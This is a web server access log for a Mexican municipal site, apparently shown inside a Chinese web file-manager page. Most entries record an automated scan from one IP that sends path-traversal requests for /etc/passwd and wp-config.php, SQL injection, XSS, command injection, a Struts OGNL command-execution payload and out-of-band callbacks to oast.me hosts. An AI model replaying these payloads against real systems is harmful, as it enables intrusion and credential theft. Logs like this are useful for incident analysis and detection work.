芝麻web文件管理V1.00

编辑当前文件:/home2/sdektunc/access-logs/chocholayucatan.sdektun.com-ssl_log
89.185.25.131 - - [01/Feb/2025:06:09:39 -0600] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:19:58 -0600] "GET /render/info.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:00 -0600] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:00 -0600] "GET /%255c%255ccudo29mjalo72u293ingfr4ixmyej4834.oast.me%255cC$%255cbb HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:02 -0600] "GET /assets/built%2F..%2F..%2F/package.json HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:05 -0600] "GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:06 -0600] "GET /api/geojson?url=file:///c://windows/win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:06 -0600] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:07 -0600] "GET /assets/built%252F..%252F..%252F%25E0%25A4%25A/package.json HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:08 -0600] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:10 -0600] "GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:12 -0600] "GET /cuenta.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" www.chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:13 -0600] "GET /cpublica.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" www.chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:13 -0600] "GET /archivos/2020/cuenta/cuentaanual.pdf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)" www.chocholayucatan.gob.mx 192.185.131.128 17.241.219.217 - - [01/Feb/2025:06:55:13 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:56:30 -0600] "GET /icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:08 -0600] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:08 -0600] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /info/dir?/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:14 -0600] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 409 83 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:14 -0600] "GET /excel.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:17 -0600] "GET /admin/ajax/avatar.php?id=-1+union+select+md5(999999999)%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" chocholayucatan.gob.mx 192.185.131.128 51.81.46.212 - - [01/Feb/2025:07:51:50 -0600] "GET / HTTP/1.1" 401 35 "-" "-" webdisk.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:35 -0600] "GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:47 -0600] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:47 -0600] "GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:49 -0600] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:51 -0600] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:53 -0600] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:03 -0600] "POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%e2%80%99%e2%80%99%26type%3d HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:04 -0600] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:05 -0600] "GET /system/config_menu.htm HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:05 -0600] "GET /_admin/imgdownload.php?filename=imgdownload.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:06 -0600] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:10 -0600] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:11 -0600] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:23 -0600] "GET /xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:07:31 -0600] "GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 51.8.102.233 - - [01/Feb/2025:09:20:25 -0600] "GET /robots.txt HTTP/2.0" 200 90 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:45 -0600] "GET /wan.htm HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:47 -0600] "GET /cgi-bin/config.exp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:47 -0600] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:49 -0600] "GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:50 -0600] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:50 -0600] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.7.24" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:08 -0600] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:08 -0600] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:15 -0600] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:06 -0600] "GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:48 -0600] "GET /assets/elFinder/elfinder.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:50 -0600] "GET /backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:52 -0600] "GET /elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:56 -0600] "GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:57 -0600] "GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.20" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:58 -0600] "GET /uploads/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:43:37 -0600] "GET /api/scrape/kube-system HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:43:42 -0600] "GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9320169)))),0x7e),3550) HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:32 -0600] "GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:33 -0600] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:34 -0600] "GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:35 -0600] "GET /api/ping/;%60id%60 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /cgi-bin/live_api.cgi?page=hqy&id=6&ip=;id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /?url=<img/src=\"http://cudo29mjalo72u293ing3saw7ennwjehp.oast.me\"> HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/618.17.9 (KHTML, like Gecko) Version/17.4 Safari/618.17.9" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /?layout=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /api/v1/serverinfo HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:45 -0600] "GET /static/link/%2e%2e/etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:45 -0600] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:47 -0600] "GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:50 -0600] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 